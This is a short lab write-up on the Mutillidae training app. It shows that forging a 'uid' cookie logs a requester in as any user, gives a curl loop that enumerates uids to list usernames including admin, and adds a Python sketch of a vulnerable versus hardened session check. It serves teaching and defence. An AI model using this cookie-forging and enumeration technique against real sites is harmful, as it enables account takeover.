A successful login redirects back to the index page, with the following cookie:
uid=23; username=ed; PHPSESSID=<whatever>
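Does just setting a uid in a cookie and then requesting the index page result in a login? Yes it does: the request below sends only the uid cookie, with no PHPSESSID, and the server still reports a logged-in user.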
$ for uid in `seq 0 24`; do user=`curl -i -s -b "uid=${uid}" 'http://localhost/mutillidae/index.php' | grep Logged-In | cut -d ' ' -f2`; echo ${uid}, ${user}; done
0,
1, admin
2, adrian
3, john
4, jeremy
5, bryce
6, samurai
7, jim
8, bobby
9, simba
10, dreveil
11, scotty
12, cal
13, john
14, kevin
15, dave
16, patches
17, rocky
18, tim
19, ABaker
20, PPan
21, CHook
22, james
23, ed
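The flaw above, modelled as an added example (not Mutillidae's code and not from the original post): whoami_vulnerable reproduces the observed behaviour of trusting the uid cookie, while whoami_hardened takes the identity from a server-side session keyed by an unguessable id. The function names, the SESSIONS store and the three-user table are assumptions made for illustration.

```python
import secrets

# Constructed sample data: three uid/username pairs taken from the output above.
USERS = {1: "admin", 2: "adrian", 23: "ed"}
SESSIONS = {}  # hypothetical server-side store: session id -> uid


def parse_cookies(header):
    """Split a Cookie header such as 'a=1; b=2' into a dict."""
    pairs = (part.split("=", 1) for part in header.split(";") if "=" in part)
    return {name.strip(): value.strip() for name, value in pairs}


def whoami_vulnerable(cookie_header):
    """Behaviour seen above: identity is read straight from the uid cookie."""
    uid = parse_cookies(cookie_header).get("uid", "")
    return USERS.get(int(uid)) if uid.isdecimal() else None


def login(uid):
    """Called only after the password check succeeds; returns the Cookie value."""
    session_id = secrets.token_urlsafe(32)  # unguessable, unlike a sequential uid
    SESSIONS[session_id] = uid
    return f"PHPSESSID={session_id}"


def whoami_hardened(cookie_header):
    """Identity comes from the server-side session; any uid cookie is ignored."""
    session_id = parse_cookies(cookie_header).get("PHPSESSID", "")
    uid = SESSIONS.get(session_id)
    return USERS.get(uid) if uid is not None else None


if __name__ == "__main__":
    ed_cookie = login(23)
    # Columns: what the vulnerable lookup returns, what the hardened one returns.
    for header in ("uid=1", ed_cookie, ed_cookie + "; uid=1", "PHPSESSID=guess"):
        print(repr(whoami_vulnerable(header)), repr(whoami_hardened(header)))
```

With the hardened lookup, a request carrying a valid session for ed plus a forged uid=1 is still treated as ed, because the uid cookie no longer takes part in the decision.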